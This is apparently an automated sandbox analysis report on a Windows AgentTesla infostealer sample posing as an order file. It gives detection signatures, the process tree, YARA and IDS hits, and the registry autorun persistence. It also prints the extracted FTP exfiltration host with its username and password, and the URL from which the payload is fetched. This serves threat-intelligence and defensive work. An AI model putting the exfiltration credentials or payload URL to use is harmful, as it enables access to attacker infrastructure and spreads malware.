Windows Analysis Report
GEFA-Order 232343-68983689.exe

Overview

General Information

Sample name: GEFA-Order 232343-68983689.exe
Analysis ID: 1529729
MD5: 0c3d0b4cd6833a23ebc0687d97c64d73
SHA1: 41bae7df2f2544b207777c920429383a88745035
SHA256: f0fa4e57be6d0ad0debbbb9189344a61896d0d38c6c9f2345d2421070e20389c
Tags: exe, SPAM-ITA, user-JAMESWT_MHT
Infos:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • GEFA-Order 232343-68983689.exe (PID: 7444 cmdline: "C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe" MD5: 0C3D0B4CD6833A23EBC0687D97C64D73)
    • InstallUtil.exe (PID: 7548 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Cbgoomiexw.exe (PID: 7744 cmdline: "C:\Users\user\AppData\Roaming\Cbgoomiexw.exe" MD5: 0C3D0B4CD6833A23EBC0687D97C64D73)
    • InstallUtil.exe (PID: 7888 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Cbgoomiexw.exe (PID: 8052 cmdline: "C:\Users\user\AppData\Roaming\Cbgoomiexw.exe" MD5: 0C3D0B4CD6833A23EBC0687D97C64D73)
    • InstallUtil.exe (PID: 8124 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Agent Tesla, AgentTesla | A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel. | SWEED | | https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.alternatifplastik.com", "Username": "fgghv@alternatifplastik.com", "Password": "Fineboy777@"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Source | Rule | Description | Author | Strings
00000007.00000002.1996337104.00000000042C0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000007.00000002.1996337104.00000000042C0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000008.00000002.2913625192.000000000330E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000000.00000002.1727745948.0000000004480000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.1727745948.0000000004480000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Source | Rule | Description | Author | Strings
0.2.GEFA-Order 232343-68983689.exe.6e10000.9.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
0.2.GEFA-Order 232343-68983689.exe.4495600.5.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0.2.GEFA-Order 232343-68983689.exe.4495600.5.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0.2.GEFA-Order 232343-68983689.exe.4495600.5.raw.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen |
  • 0x33061:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x330d3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x3315d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x331ef:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x33259:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x332cb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x33361:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x333f1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.GEFA-Order 232343-68983689.exe.4495600.5.raw.unpack | MALWARE_Win_AgentTeslaV2 | AgenetTesla Type 2 Keylogger payload | ditekSHen |
  • 0x3047c:$s2: GetPrivateProfileString
  • 0x2fb9d:$s3: get_OSFullName
  • 0x3118e:$s5: remove_Key
  • 0x3136c:$s5: remove_Key
  • 0x3227a:$s6: FtpWebRequest
  • 0x33043:$s7: logins
  • 0x335b5:$s7: logins
  • 0x362ba:$s7: logins
  • 0x36378:$s7: logins
  • 0x37c7e:$s7: logins
  • 0x36f1c:$s9: 1.85 (Hash, version 2, native byte-order)

                    System Summary

Source: Registry Key set
Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
Data: Details: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe, ProcessId: 7444, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cbgoomiexw
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-09T10:51:06.765174+0200 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 5.2.84.236 | 21 | TCP
2024-10-09T10:51:22.680290+0200 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.4 | 49740 | 5.2.84.236 | 21 | TCP
2024-10-09T10:51:31.312442+0200 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.4 | 49743 | 5.2.84.236 | 21 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-09T10:51:07.397881+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.4 | 49732 | 5.2.84.236 | 54172 | TCP
2024-10-09T10:51:07.404047+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.4 | 49732 | 5.2.84.236 | 54172 | TCP
2024-10-09T10:51:23.289578+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.4 | 49741 | 5.2.84.236 | 59878 | TCP
2024-10-09T10:51:23.295500+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.4 | 49741 | 5.2.84.236 | 59878 | TCP
2024-10-09T10:51:31.937083+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.4 | 49744 | 5.2.84.236 | 50958 | TCP
2024-10-09T10:51:31.942584+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.4 | 49744 | 5.2.84.236 | 50958 | TCP


                    AV Detection

Source: GEFA-Order 232343-68983689.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe | Avira: detection malicious, Label: HEUR/AGEN.1308518
Source: 0.2.GEFA-Order 232343-68983689.exe.4495600.5.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.alternatifplastik.com", "Username": "fgghv@alternatifplastik.com", "Password": "Fineboy777@"}
Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe | ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe | Virustotal: Detection: 26%
Source: GEFA-Order 232343-68983689.exe | ReversingLabs: Detection: 15%
Source: GEFA-Order 232343-68983689.exe | Virustotal: Detection: 26%
Source: Submited Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe | Joe Sandbox ML: detected
Source: GEFA-Order 232343-68983689.exe | Joe Sandbox ML: detected
Source: GEFA-Order 232343-68983689.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 103.191.208.122:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 103.191.208.122:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 103.191.208.122:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: GEFA-Order 232343-68983689.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1716960379.000000000342A000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1736166624.0000000006F60000.00000004.08000000.00040000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.000000000440A000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000003.00000002.1881514343.000000000281A000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000007.00000002.1965310119.000000000314C000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1716960379.000000000342A000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1736166624.0000000006F60000.00000004.08000000.00040000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.000000000440A000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000003.00000002.1881514343.000000000281A000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000007.00000002.1965310119.000000000314C000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1735785966.0000000006E80000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1735785966.0000000006E80000.00000004.08000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe | Code function: 4x nop then jmp 06D78E01h | 0_2_06D78DA0
Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe | Code function: 4x nop then jmp 06D78E01h | 0_2_06D78D91
Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe | Code function: 4x nop then jmp 06EE614Eh | 0_2_06EE5F60
Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe | Code function: 4x nop then jmp 06EE614Eh | 0_2_06EE5F51
Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe | Code function: 4x nop then jmp 06198E01h | 3_2_06198DA0
Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe | Code function: 4x nop then jmp 06198E01h | 3_2_06198D91
Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe | Code function: 4x nop then jmp 0630614Eh | 3_2_06305F60
Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe | Code function: 4x nop then jmp 0630614Eh | 3_2_06305F52
Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe | Code function: 4x nop then jmp 06AE8E01h | 7_2_06AE8DA0
Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe | Code function: 4x nop then jmp 06AE8E01h | 7_2_06AE8D93
Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe | Code function: 4x nop then jmp 06C5614Eh | 7_2_06C55F53
Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe | Code function: 4x nop then jmp 06C5614Eh | 7_2_06C55F60

                    Networking

Source: Network traffic | Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49732 -> 5.2.84.236:54172
Source: Network traffic | Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49731 -> 5.2.84.236:21
Source: Network traffic | Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49741 -> 5.2.84.236:59878
Source: Network traffic | Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49740 -> 5.2.84.236:21
Source: Network traffic | Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49744 -> 5.2.84.236:50958
Source: Network traffic | Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49743 -> 5.2.84.236:21
Source: global traffic | TCP traffic: 5.2.84.236 ports 50958,54172,59878,1,2,21
Source: global traffic | TCP traffic: 192.168.2.4:49732 -> 5.2.84.236:54172
Source: global traffic | HTTP traffic detected: GET /omani/Mrlres.mp3 HTTP/1.1, Host: rubberpartsmanufacturers.com, Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /omani/Mrlres.mp3 HTTP/1.1, Host: rubberpartsmanufacturers.com, Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /omani/Mrlres.mp3 HTTP/1.1, Host: rubberpartsmanufacturers.com, Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 5.2.84.236 5.2.84.236
Source: Joe Sandbox View | ASN Name: ALASTYRTR ALASTYRTR
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | FTP traffic detected: 5.2.84.236:21 -> 192.168.2.4:49731
  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
  220-You are user number 2 of 100 allowed.
  220-Local time is now 11:51. Server port: 21.
  220-This is a private system - No anonymous login
  220-IPv6 connections are also welcome on this server.
  220 You will be disconnected after 10 minutes of inactivity.
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: rubberpartsmanufacturers.com
Source: global traffic | DNS traffic detected: DNS query: ftp.alternatifplastik.com
                    Source: InstallUtil.exe, 00000001.00000002.1884023773.0000000002F5C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.1884023773.0000000002F4E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.1966127439.00000000028D0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.1966127439.00000000028DE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2913625192.000000000330E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2913625192.000000000331C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.alternatifplastik.com
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1716960379.0000000003261000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.1884023773.0000000002F4E000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000003.00000002.1881514343.0000000002651000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.1966127439.00000000028D0000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000007.00000002.1965310119.0000000002FFC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2913625192.000000000330E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004480000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1716960379.00000000034E2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.1879017395.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000003.00000002.1881514343.00000000028CC000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000003.00000002.1903361036.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000007.00000002.1996337104.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000007.00000002.1965310119.00000000031FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1735785966.0000000006E80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1735785966.0000000006E80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1735785966.0000000006E80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1716960379.0000000003261000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000003.00000002.1881514343.0000000002651000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000007.00000002.1965310119.0000000002FFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rubberpartsmanufacturers.com
                    Source: GEFA-Order 232343-68983689.exe, Cbgoomiexw.exe.0.drString found in binary or memory: https://rubberpartsmanufacturers.com/omani/Mrlres.mp3
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1735785966.0000000006E80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1735785966.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1716960379.00000000032AA000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000003.00000002.1881514343.000000000269A000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000007.00000002.1965310119.00000000030D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1735785966.0000000006E80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.GEFA-Order 232343-68983689.exe.4495600.5.raw.unpack, SKTzxzsJw.cs | .Net Code: RePIUNFdBeM

                    System Summary

Source: 0.2.GEFA-Order 232343-68983689.exe.4495600.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.GEFA-Order 232343-68983689.exe.4495600.5.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.GEFA-Order 232343-68983689.exe.4495600.5.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.GEFA-Order 232343-68983689.exe.4495600.5.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: initial sample | Static PE information: Filename: GEFA-Order 232343-68983689.exe
Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe | Code function: 0_2_06EE2430 NtProtectVirtualMemory,0_2_06EE2430
Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe | Code function: 0_2_06EE3520 NtResumeThread,0_2_06EE3520
Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe | Code function: 0_2_06EE2428 NtProtectVirtualMemory,0_2_06EE2428
Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe | Code function: 0_2_06EE3518 NtResumeThread,0_2_06EE3518
Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe | Code function: 3_2_06302430 NtProtectVirtualMemory,3_2_06302430
Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe | Code function: 3_2_06303520 NtResumeThread,3_2_06303520
Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe | Code function: 3_2_06302428 NtProtectVirtualMemory,3_2_06302428
Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe | Code function: 3_2_06303518 NtResumeThread,3_2_06303518
Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe | Code function: 7_2_06C52430 NtProtectVirtualMemory,7_2_06C52430
Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe | Code function: 7_2_06C53520 NtResumeThread,7_2_06C53520
Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe | Code function: 7_2_06C52428 NtProtectVirtualMemory,7_2_06C52428
Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe | Code function: 7_2_06C53518 NtResumeThread,7_2_06C53518
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064A00401_2_064A0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064A3F281_2_064A3F28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064ABCC81_2_064ABCC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064A2AE81_2_064A2AE8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064A8B5A1_2_064A8B5A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064ADBF81_2_064ADBF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064A321B1_2_064A321B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064A4FD01_2_064A4FD0
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_0260CE7C3_2_0260CE7C
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_0619F3703_2_0619F370
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_06199D983_2_06199D98
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_0619A9803_2_0619A980
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_0619F3603_2_0619F360
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_0619A9713_2_0619A971
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_061951D83_2_061951D8
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_061BC7883_2_061BC788
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_061B142C3_2_061B142C
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_061BD4D03_2_061BD4D0
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_061B00403_2_061B0040
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_061BC8343_2_061BC834
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_061BC77E3_2_061BC77E
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_061BB7B03_2_061BB7B0
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_061BB7A13_2_061BB7A1
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_061B427F3_2_061B427F
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_061B42903_2_061B4290
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_061B600D3_2_061B600D
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_061B00063_2_061B0006
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_061B60303_2_061B6030
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_061B30B03_2_061B30B0
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_061B30C03_2_061B30C0
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_061BCA333_2_061BCA33
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_0630FE393_2_0630FE39
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_06305F603_2_06305F60
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_06305F523_2_06305F52
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_063384203_2_06338420
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_0633C0503_2_0633C050
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_06338E703_2_06338E70
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_06338E613_2_06338E61
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_0633D6683_2_0633D668
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_06335F0D3_2_06335F0D
